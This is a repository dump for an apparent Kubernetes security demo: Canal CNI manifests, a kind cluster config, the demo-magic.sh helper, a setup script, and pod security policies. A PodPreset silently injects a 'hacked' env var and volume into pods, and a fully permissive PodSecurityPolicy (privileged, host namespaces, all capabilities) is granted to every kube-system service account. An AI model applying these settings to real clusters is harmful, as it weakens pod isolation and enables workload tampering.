- bgpconfigurations 260 | - ippools 261 | - ipamblocks 262 | - globalnetworkpolicies 263 | - globalnetworksets 264 | - networkpolicies 265 | - networksets 266 | - clusterinformations 267 | - hostendpoints 268 | verbs: 269 | - get 270 | - list 271 | - watch 272 | # Calico must create and update some CRDs on startup. 273 | - apiGroups: ["crd.projectcalico.org"] 274 | resources: 275 | - ippools 276 | - felixconfigurations 277 | - clusterinformations 278 | verbs: 279 | - create 280 | - update 281 | # Calico stores some configuration information on the node. 282 | - apiGroups: [""] 283 | resources: 284 | - nodes 285 | verbs: 286 | - get 287 | - list 288 | - watch 289 | # These permissions are only requried for upgrade from v2.6, and can 290 | # be removed after upgrade or on fresh installations. 291 | - apiGroups: ["crd.projectcalico.org"] 292 | resources: 293 | - bgpconfigurations 294 | - bgppeers 295 | verbs: 296 | - create 297 | - update 298 | --- 299 | # Flannel ClusterRole 300 | # Pulled from https://github.com/coreos/flannel/blob/master/Documentation/kube-flannel-rbac.yml 301 | kind: ClusterRole 302 | apiVersion: rbac.authorization.k8s.io/v1 303 | metadata: 304 | name: flannel 305 | rules: 306 | - apiGroups: [""] 307 | resources: 308 | - pods 309 | verbs: 310 | - get 311 | - apiGroups: [""] 312 | resources: 313 | - nodes 314 | verbs: 315 | - list 316 | - watch 317 | - apiGroups: [""] 318 | resources: 319 | - nodes/status 320 | verbs: 321 | - patch 322 | --- 323 | # Bind the flannel ClusterRole to the canal ServiceAccount. 324 | kind: ClusterRoleBinding 325 | apiVersion: rbac.authorization.k8s.io/v1 326 | metadata: 327 | name: canal-flannel 328 | roleRef: 329 | apiGroup: rbac.authorization.k8s.io 330 | kind: ClusterRole 331 | name: flannel 332 | subjects: 333 | - kind: ServiceAccount 334 | name: canal 335 | namespace: kube-system 336 | --- 337 | apiVersion: rbac.authorization.k8s.io/v1 338 | kind: ClusterRoleBinding 339 | metadata: 340 | name: canal-calico 341 | roleRef: 342 | apiGroup: rbac.authorization.k8s.io 343 | kind: ClusterRole 344 | name: calico-node 345 | subjects: 346 | - kind: ServiceAccount 347 | name: canal 348 | namespace: kube-system 349 | 350 | --- 351 | # Source: calico/templates/calico-node.yaml 352 | # This manifest installs the canal container, as well 353 | # as the CNI plugins and network config on 354 | # each master and worker node in a Kubernetes cluster. 355 | kind: DaemonSet 356 | apiVersion: apps/v1 357 | metadata: 358 | name: canal 359 | namespace: kube-system 360 | labels: 361 | k8s-app: canal 362 | spec: 363 | selector: 364 | matchLabels: 365 | k8s-app: canal 366 | updateStrategy: 367 | type: RollingUpdate 368 | rollingUpdate: 369 | maxUnavailable: 1 370 | template: 371 | metadata: 372 | labels: 373 | k8s-app: canal 374 | annotations: 375 | # This, along with the CriticalAddonsOnly toleration below, 376 | # marks the pod as a critical add-on, ensuring it gets 377 | # priority scheduling and that its resources are reserved 378 | # if it ever gets evicted. 379 | scheduler.alpha.kubernetes.io/critical-pod: '' 380 | spec: 381 | nodeSelector: 382 | beta.kubernetes.io/os: linux 383 | hostNetwork: true 384 | tolerations: 385 | # Make sure canal gets scheduled on all nodes. 386 | - effect: NoSchedule 387 | operator: Exists 388 | # Mark the pod as a critical add-on for rescheduling. 389 | - key: CriticalAddonsOnly 390 | operator: Exists 391 | - effect: NoExecute 392 | operator: Exists 393 | serviceAccountName: canal 394 | # Minimize downtime during a rolling upgrade or deletion; tell Kubernetes to do a "force 395 | # deletion": https://kubernetes.io/docs/concepts/workloads/pods/pod/#termination-of-pods. 396 | terminationGracePeriodSeconds: 0 397 | priorityClassName: system-node-critical 398 | initContainers: 399 | # This container installs the CNI binaries 400 | # and CNI network config file on each node. 401 | - name: install-cni 402 | image: calico/cni:v3.8.1 403 | command: ["/install-cni.sh"] 404 | env: 405 | # Name of the CNI config file to create. 406 | - name: CNI_CONF_NAME 407 | value: "10-canal.conflist" 408 | # The CNI network config to install on each node. 409 | - name: CNI_NETWORK_CONFIG 410 | valueFrom: 411 | configMapKeyRef: 412 | name: canal-config 413 | key: cni_network_config 414 | # Set the hostname based on the k8s node name. 415 | - name: KUBERNETES_NODE_NAME 416 | valueFrom: 417 | fieldRef: 418 | fieldPath: spec.nodeName 419 | # Prevents the container from sleeping forever. 420 | - name: SLEEP 421 | value: "false" 422 | volumeMounts: 423 | - mountPath: /host/opt/cni/bin 424 | name: cni-bin-dir 425 | - mountPath: /host/etc/cni/net.d 426 | name: cni-net-dir 427 | # Adds a Flex Volume Driver that creates a per-pod Unix Domain Socket to allow Dikastes 428 | # to communicate with Felix over the Policy Sync API. 429 | - name: flexvol-driver 430 | image: calico/pod2daemon-flexvol:v3.8.1 431 | volumeMounts: 432 | - name: flexvol-driver-host 433 | mountPath: /host/driver 434 | containers: 435 | # Runs canal container on each Kubernetes node. This 436 | # container programs network policy and routes on each 437 | # host. 438 | - name: calico-node 439 | image: calico/node:v3.8.1 440 | env: 441 | # Use Kubernetes API as the backing datastore. 442 | - name: DATASTORE_TYPE 443 | value: "kubernetes" 444 | # Configure route aggregation based on pod CIDR. 445 | - name: USE_POD_CIDR 446 | value: "true" 447 | # Wait for the datastore. 448 | - name: WAIT_FOR_DATASTORE 449 | value: "true" 450 | # Set based on the k8s node name. 451 | - name: NODENAME 452 | valueFrom: 453 | fieldRef: 454 | fieldPath: spec.nodeName 455 | # Don't enable BGP. 456 | - name: CALICO_NETWORKING_BACKEND 457 | value: "none" 458 | # Cluster type to identify the deployment type 459 | - name: CLUSTER_TYPE 460 | value: "k8s,canal" 461 | # Period, in seconds, at which felix re-applies all iptables state 462 | - name: FELIX_IPTABLESREFRESHINTERVAL 463 | value: "60" 464 | # No IP address needed. 465 | - name: IP 466 | value: "" 467 | # The default IPv4 pool to create on startup if none exists. Pod IPs will be 468 | # chosen from this range. Changing this value after installation will have 469 | # no effect. This should fall within `--cluster-cidr`. 470 | - name: CALICO_IPV4POOL_CIDR 471 | value: "192.168.0.0/16" 472 | # Disable file logging so `kubectl logs` works. 473 | - name: CALICO_DISABLE_FILE_LOGGING 474 | value: "true" 475 | # Set Felix endpoint to host default action to ACCEPT. 476 | - name: FELIX_DEFAULTENDPOINTTOHOSTACTION 477 | value: "ACCEPT" 478 | # Disable IPv6 on Kubernetes. 479 | - name: FELIX_IPV6SUPPORT 480 | value: "false" 481 | # Set Felix logging to "info" 482 | - name: FELIX_LOGSEVERITYSCREEN 483 | value: "info" 484 | - name: FELIX_HEALTHENABLED 485 | value: "true" 486 | securityContext: 487 | privileged: true 488 | resources: 489 | requests: 490 | cpu: 250m 491 | livenessProbe: 492 | httpGet: 493 | path: /liveness 494 | port: 9099 495 | host: localhost 496 | periodSeconds: 10 497 | initialDelaySeconds: 10 498 | failureThreshold: 6 499 | readinessProbe: 500 | httpGet: 501 | path: /readiness 502 | port: 9099 503 | host: localhost 504 | periodSeconds: 10 505 | volumeMounts: 506 | - mountPath: /lib/modules 507 | name: lib-modules 508 | readOnly: true 509 | - mountPath: /run/xtables.lock 510 | name: xtables-lock 511 | readOnly: false 512 | - mountPath: /var/run/calico 513 | name: var-run-calico 514 | readOnly: false 515 | - mountPath: /var/lib/calico 516 | name: var-lib-calico 517 | readOnly: false 518 | - name: policysync 519 | mountPath: /var/run/nodeagent 520 | # This container runs flannel using the kube-subnet-mgr backend 521 | # for allocating subnets. 522 | - name: kube-flannel 523 | image: quay.io/coreos/flannel:v0.11.0 524 | command: [ "/opt/bin/flanneld", "--ip-masq", "--kube-subnet-mgr" ] 525 | securityContext: 526 | privileged: true 527 | env: 528 | - name: POD_NAME 529 | valueFrom: 530 | fieldRef: 531 | fieldPath: metadata.name 532 | - name: POD_NAMESPACE 533 | valueFrom: 534 | fieldRef: 535 | fieldPath: metadata.namespace 536 | - name: FLANNELD_IFACE 537 | valueFrom: 538 | configMapKeyRef: 539 | name: canal-config 540 | key: canal_iface 541 | - name: FLANNELD_IP_MASQ 542 | valueFrom: 543 | configMapKeyRef: 544 | name: canal-config 545 | key: masquerade 546 | volumeMounts: 547 | - mountPath: /run/xtables.lock 548 | name: xtables-lock 549 | readOnly: false 550 | - name: flannel-cfg 551 | mountPath: /etc/kube-flannel/ 552 | volumes: 553 | # Used by canal. 554 | - name: lib-modules 555 | hostPath: 556 | path: /lib/modules 557 | - name: var-run-calico 558 | hostPath: 559 | path: /var/run/calico 560 | - name: var-lib-calico 561 | hostPath: 562 | path: /var/lib/calico 563 | - name: xtables-lock 564 | hostPath: 565 | path: /run/xtables.lock 566 | type: FileOrCreate 567 | # Used by flannel. 568 | - name: flannel-cfg 569 | configMap: 570 | name: canal-config 571 | # Used to install CNI. 572 | - name: cni-bin-dir 573 | hostPath: 574 | path: /opt/cni/bin 575 | - name: cni-net-dir 576 | hostPath: 577 | path: /etc/cni/net.d 578 | # Used to create per-pod Unix Domain Sockets 579 | - name: policysync 580 | hostPath: 581 | type: DirectoryOrCreate 582 | path: /var/run/nodeagent 583 | # Used to install Flex Volume Driver 584 | - name: flexvol-driver-host 585 | hostPath: 586 | type: DirectoryOrCreate 587 | path: /usr/libexec/kubernetes/kubelet-plugins/volume/exec/nodeagent~uds 588 | --- 589 | 590 | apiVersion: v1 591 | kind: ServiceAccount 592 | metadata: 593 | name: canal 594 | namespace: kube-system 595 | 596 | --- 597 | # Source: calico/templates/calico-etcd-secrets.yaml 598 | 599 | --- 600 | # Source: calico/templates/calico-kube-controllers.yaml 601 | 602 | --- 603 | # Source: calico/templates/calico-typha.yaml 604 | 605 | --- 606 | # Source: calico/templates/configure-canal.yaml 607 | 608 | 609 | -------------------------------------------------------------------------------- /kind/config: -------------------------------------------------------------------------------- 1 | kind: Cluster 2 | apiVersion: kind.sigs.k8s.io/v1alpha3 3 | networking: 4 | disableDefaultCNI: True 5 | nodes: 6 | - role: control-plane 7 | - role: worker 8 | - role: worker 9 | kubeadmConfigPatches: 10 | - | 11 | apiVersion: kubeadm.k8s.io/v1beta2 12 | kind: ClusterConfiguration 13 | metadata: 14 | name: config 15 | apiServer: 16 | extraArgs: 17 | "enable-admission-plugins": "PodSecurityPolicy,PodPreset" 18 | "runtime-config": "settings.k8s.io/v1alpha1=true" 19 | networking: 20 | serviceSubnet: "10.96.0.1/12" 21 | podSubnet: "10.244.0.0/16" 22 | -------------------------------------------------------------------------------- /kind/fix_sysctls.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | kind get nodes | xargs -n1 -I {} docker exec {} sysctl -w net.ipv4.conf.all.rp_filter=0 4 | -------------------------------------------------------------------------------- /lib/demo-magic.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ############################################################################### 4 | # 5 | # demo-magic.sh 6 | # 7 | # Copyright (c) 2015 Paxton Hare 8 | # 9 | # This script lets you script demos in bash. It runs through your demo script when you press 10 | # ENTER. It simulates typing and runs commands. 11 | # 12 | ############################################################################### 13 | 14 | # the speed to "type" the text 15 | TYPE_SPEED=20 16 | 17 | # no wait after "p" or "pe" 18 | NO_WAIT=false 19 | 20 | # if > 0, will pause for this amount of seconds before automatically proceeding with any p or pe 21 | PROMPT_TIMEOUT=0 22 | 23 | # don't show command number unless user specifies it 24 | SHOW_CMD_NUMS=false 25 | 26 | 27 | # handy color vars for pretty prompts 28 | BLACK="\033[0;30m" 29 | BLUE="\033[0;34m" 30 | GREEN="\033[0;32m" 31 | GREY="\033[0;90m" 32 | CYAN="\033[0;36m" 33 | RED="\033[0;31m" 34 | PURPLE="\033[0;35m" 35 | BROWN="\033[0;33m" 36 | WHITE="\033[1;37m" 37 | COLOR_RESET="\033[0m" 38 | 39 | C_NUM=0 40 | 41 | # prompt and command color which can be overriden 42 | DEMO_PROMPT="$ " 43 | DEMO_CMD_COLOR=$WHITE 44 | DEMO_COMMENT_COLOR=$GREY 45 | 46 | ## 47 | # prints the script usage 48 | ## 49 | function usage() { 50 | echo -e "" 51 | echo -e "Usage: $0 [options]" 52 | echo -e "" 53 | echo -e "\tWhere options is one or more of:" 54 | echo -e "\t-h\tPrints Help text" 55 | echo -e "\t-d\tDebug mode. Disables simulated typing" 56 | echo -e "\t-n\tNo wait" 57 | echo -e "\t-w\tWaits max the given amount of seconds before proceeding with demo (e.g. '-w5')" 58 | echo -e "" 59 | } 60 | 61 | ## 62 | # wait for user to press ENTER 63 | # if $PROMPT_TIMEOUT > 0 this will be used as the max time for proceeding automatically 64 | ## 65 | function wait() { 66 | if [[ "$PROMPT_TIMEOUT" == "0" ]]; then 67 | read -rs 68 | else 69 | read -rst "$PROMPT_TIMEOUT" 70 | fi 71 | } 72 | 73 | ## 74 | # print command only. Useful for when you want to pretend to run a command 75 | # 76 | # takes 1 param - the string command to print 77 | # 78 | # usage: p "ls -l" 79 | # 80 | ## 81 | function p() { 82 | if [[ ${1:0:1} == "#" ]]; then 83 | cmd=$DEMO_COMMENT_COLOR$1$COLOR_RESET 84 | else 85 | cmd=$DEMO_CMD_COLOR$1$COLOR_RESET 86 | fi 87 | 88 | # render the prompt 89 | x=$(PS1="$DEMO_PROMPT" "$BASH" --norc -i &1 | sed -n '${s/^\(.*\)exit$/\1/p;}') 90 | 91 | # show command number is selected 92 | if $SHOW_CMD_NUMS; then 93 | printf "[$((++C_NUM))] $x" 94 | else 95 | printf "$x" 96 | fi 97 | 98 | # wait for the user to press a key before typing the command 99 | if !($NO_WAIT); then 100 | wait 101 | fi 102 | 103 | if [[ -z $TYPE_SPEED ]]; then 104 | echo -en "$cmd" 105 | else 106 | echo -en "$cmd" | pv -qL $[$TYPE_SPEED+(-2 + RANDOM%5)]; 107 | fi 108 | 109 | # wait for the user to press a key before moving on 110 | if !($NO_WAIT); then 111 | wait 112 | fi 113 | echo "" 114 | } 115 | 116 | ## 117 | # Prints and executes a command 118 | # 119 | # takes 1 parameter - the string command to run 120 | # 121 | # usage: pe "ls -l" 122 | # 123 | ## 124 | function pe() { 125 | # print the command 126 | p "$@" 127 | 128 | # execute the command 129 | eval "$@" 130 | } 131 | 132 | ## 133 | # Enters script into interactive mode 134 | # 135 | # and allows newly typed commands to be executed within the script 136 | # 137 | # usage : cmd 138 | # 139 | ## 140 | function cmd() { 141 | # render the prompt 142 | x=$(PS1="$DEMO_PROMPT" "$BASH" --norc -i &1 | sed -n '${s/^\(.*\)exit$/\1/p;}') 143 | printf "$x\033[0m" 144 | read command 145 | eval "${command}" 146 | } 147 | 148 | 149 | function check_pv() { 150 | command -v pv >/dev/null 2>&1 || { 151 | 152 | echo "" 153 | echo -e "${RED}##############################################################" 154 | echo "# HOLD IT!! I require pv but it's not installed. Aborting." >&2; 155 | echo -e "${RED}##############################################################" 156 | echo "" 157 | echo -e "${COLOR_RESET}Installing pv:" 158 | echo "" 159 | echo -e "${BLUE}Mac:${COLOR_RESET} $ brew install pv" 160 | echo "" 161 | echo -e "${BLUE}Other:${COLOR_RESET} http://www.ivarch.com/programs/pv.shtml" 162 | echo -e "${COLOR_RESET}" 163 | exit 1; 164 | } 165 | } 166 | 167 | check_pv 168 | # 169 | # handle some default params 170 | # -h for help 171 | # -d for disabling simulated typing 172 | # 173 | while getopts ":dhncw:" opt; do 174 | case $opt in 175 | h) 176 | usage 177 | exit 1 178 | ;; 179 | d) 180 | unset TYPE_SPEED 181 | ;; 182 | n) 183 | NO_WAIT=true 184 | ;; 185 | c) 186 | SHOW_CMD_NUMS=true 187 | ;; 188 | w) 189 | PROMPT_TIMEOUT=$OPTARG 190 | ;; 191 | esac 192 | done 193 | -------------------------------------------------------------------------------- /podpresets/preset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: settings.k8s.io/v1alpha1 2 | kind: PodPreset 3 | metadata: 4 | name: example 5 | spec: 6 | selector: 7 | matchExpressions: 8 | - key: disable 9 | operator: DoesNotExist 10 | env: 11 | - name: hacked 12 | value: "true" 13 | volumeMounts: 14 | - mountPath: /certsmaybe 15 | name: certs-volume 16 | volumes: 17 | - name: certs-volume 18 | emptyDir: {} 19 | -------------------------------------------------------------------------------- /psp/allow-all-clusterrolebinding.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: rbac.authorization.k8s.io/v1 2 | kind: ClusterRoleBinding 3 | metadata: 4 | name: allow-all-kube-system 5 | roleRef: 6 | apiGroup: rbac.authorization.k8s.io 7 | kind: ClusterRole 8 | name: psp-permissive 9 | subjects: 10 | - kind: Group 11 | name: system:serviceaccounts 12 | namespace: kube-system 13 | -------------------------------------------------------------------------------- /psp/allow-kubeadm-clusterrolebinding.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: rbac.authorization.k8s.io/v1 2 | kind: ClusterRoleBinding 3 | metadata: 4 | name: kubeadm-kube-system 5 | roleRef: 6 | apiGroup: rbac.authorization.k8s.io 7 | kind: ClusterRole 8 | name: psp-permissive 9 | subjects: 10 | - apiGroup: rbac.authorization.k8s.io 11 | kind: User 12 | name: system:node:kind-control-plane 13 | - kind: ServiceAccount 14 | name: flannel 15 | namespace: kube-system 16 | - kind: ServiceAccount 17 | name: coredns 18 | namespace: kube-system 19 | - kind: ServiceAccount 20 | name: kube-proxy 21 | namespace: kube-system 22 | - kind: Group 23 | apiGroup: rbac.authorization.k8s.io 24 | name: system:nodes 25 | - kind: User 26 | apiGroup: rbac.authorization.k8s.io 27 | name: kubelet 28 | -------------------------------------------------------------------------------- /psp/allow-restricted-clusterrolebinding.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: rbac.authorization.k8s.io/v1 2 | kind: ClusterRoleBinding 3 | metadata: 4 | name: allow-restricted-kube-system 5 | roleRef: 6 | apiGroup: rbac.authorization.k8s.io 7 | kind: ClusterRole 8 | name: psp-restrictive 9 | subjects: 10 | - kind: Group 11 | name: system:serviceaccounts 12 | namespace: kube-system 13 | -------------------------------------------------------------------------------- /psp/permissive-psp.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: policy/v1beta1 2 | kind: PodSecurityPolicy 3 | metadata: 4 | name: permissive 5 | annotations: 6 | seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*' 7 | spec: 8 | privileged: true 9 | hostNetwork: true 10 | allowPrivilegeEscalation: true 11 | allowedCapabilities: 12 | - '*' 13 | volumes: 14 | - '*' 15 | hostNetwork: true 16 | hostPorts: 17 | hostIPC: true 18 | hostPID: true 19 | seLinux: 20 | rule: RunAsAny 21 | supplementalGroups: 22 | rule: RunAsAny 23 | runAsUser: 24 | rule: RunAsAny 25 | fsGroup: 26 | rule: RunAsAny 27 | hostPorts: 28 | - min: 0 29 | max: 65535 30 | volumes: 31 | - '*' 32 | -------------------------------------------------------------------------------- /psp/psp-permissive-clusterrole.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: rbac.authorization.k8s.io/v1 2 | kind: ClusterRole 3 | metadata: 4 | name: psp-permissive 5 | rules: 6 | - apiGroups: 7 | - extensions 8 | resourceNames: 9 | - permissive 10 | resources: 11 | - podsecuritypolicies 12 | verbs: 13 | - use 14 | -------------------------------------------------------------------------------- /psp/psp-restrictive-clusterrole.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: rbac.authorization.k8s.io/v1 2 | kind: ClusterRole 3 | metadata: 4 | name: psp-restrictive 5 | rules: 6 | - apiGroups: 7 | - extensions 8 | resourceNames: 9 | - restrictive 10 | resources: 11 | - podsecuritypolicies 12 | verbs: 13 | - use 14 | -------------------------------------------------------------------------------- /psp/restrictive-psp.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: policy/v1beta1 2 | kind: PodSecurityPolicy 3 | metadata: 4 | name: restrictive 5 | spec: 6 | privileged: false 7 | hostNetwork: false 8 | allowPrivilegeEscalation: false 9 | defaultAllowPrivilegeEscalation: false 10 | hostPID: false 11 | hostIPC: false 12 | runAsUser: 13 | rule: RunAsAny 14 | fsGroup: 15 | rule: RunAsAny 16 | seLinux: 17 | rule: RunAsAny 18 | supplementalGroups: 19 | rule: RunAsAny 20 | volumes: 21 | - 'configMap' 22 | - 'downwardAPI' 23 | - 'emptyDir' 24 | - 'persistentVolumeClaim' 25 | - 'secret' 26 | - 'projected' 27 | allowedCapabilities: 28 | - '*' 29 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "cache all the images for our cluster" 3 | cat images/images | xargs -P0 -n1 -I {} docker pull {} 4 | 5 | echo "delete old cluster" 6 | kind delete cluster 7 | 8 | echo "create the cluster" 9 | kind create cluster --config kind/config 10 | 11 | echo "push the images into the kind cluster this takes about 5 minutes" 12 | time cat images/images | xargs -P2 -n1 -I {} kind load docker-image {} 13 | 14 | echo "fix the sysctls for calico" 15 | kind get nodes | xargs -n1 -I {} docker exec {} sysctl -w net.ipv4.conf.all.rp_filter=0 16 | 17 | 18 | echo "apply cni manifests" 19 | kubectl apply -f kind/canal.yaml 20 | 21 | echo "apply Pod Security Policys" 22 | kubectl apply -f psp/ 23 | 24 | echo "done it's demo time!" 25 | --------------------------------------------------------------------------------